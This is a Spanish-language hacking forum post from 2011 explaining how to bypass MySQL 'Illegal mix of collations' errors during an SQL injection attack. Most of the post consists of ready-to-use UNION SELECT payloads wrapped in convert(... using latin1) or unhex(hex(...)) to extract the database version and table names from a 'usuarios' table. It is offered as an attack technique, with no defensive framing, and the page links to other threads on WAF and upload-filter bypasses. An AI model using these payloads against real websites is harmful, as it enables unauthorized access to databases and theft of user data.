comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Bypassear "Illegal mix of collations"

  • 0 Respuestas
  • 1246 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Abnormality

  • *
  • Underc0der
  • Mensajes: 392
  • Actividad:
    0%
  • Reputación 0
  • %SystemRoot%
    • Ver Perfil
    • Email
« en: Agosto 25, 2011, 12:16:05 am »
Bueno supongamos que tenemos una inyeccion comun y ya sacamos las columnas vulnerables, ahi es cuando tratamos de encontrar la version y hacemos


You are not allowed to view links. Register or Login UNION SELECT 1,2,version(),4,5,6,7--

o sino

You are not allowed to view links. Register or Login UNION SELECT 1,2,@@version,4,5,6,7--

Ahi aparece el error de: "SQL Error : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'

AUNQUE A VECES NO APARECE NADA CUANDO INTENTAMOS PONER VERSION() POR EJEMPLO ASI QUE SIGNIFICA QUE ES ESTE MISMO ERROR

Hay varias maneras de bypassear esto, algunas son:

Convert("comando" using latin1)

unhex(hex("comando"))

Ejemplos:

You are not allowed to view links. Register or Login UNION SELECT 1,2,convert(version() using latin1),4,5,6,7--

You are not allowed to view links. Register or Login UNION SELECT 1,2,unhex(hex(version())),4,5,6,7--

You are not allowed to view links. Register or Login UNION SELECT 1,2,convert(@@version using latin1)4,5,6,7--

LA INYECCION SE TIENE QUE SEGUIR HACIENDO DE ESA MANERA, POR EJEMPLO:

You are not allowed to view links. Register or Login UNION SELECT 1,2,unhex(hex(group_concat(table_name))),4,5,6,7 FROM usuarios--

Espero que les haya gustado!

 

¿Te gustó el post? COMPARTILO!



Métodos para bypassear un WAF en Inyección SQLi

Iniciado por M5f3r0

Respuestas: 6
Vistas: 2995
Último mensaje Agosto 05, 2013, 01:24:32 pm
por Mr. Foster
Otra forma de bypassear un uploader

Iniciado por Xt3mP

Respuestas: 0
Vistas: 2427
Último mensaje Abril 20, 2012, 02:42:01 am
por Xt3mP
Bypassear uploader con validacion en JavaScript

Iniciado por Xt3mP

Respuestas: 2
Vistas: 2315
Último mensaje Agosto 30, 2012, 01:31:40 pm
por hdbreaker
Bypassear FuckingScan[Mozilla Firefox]

Iniciado por Matabarras

Respuestas: 1
Vistas: 1523
Último mensaje Abril 16, 2014, 07:07:42 am
por meteor0
Explotando "LNK" con MetaSploit 0-day

Iniciado por Devilboy

Respuestas: 0
Vistas: 1442
Último mensaje Julio 23, 2010, 03:14:24 pm
por Devilboy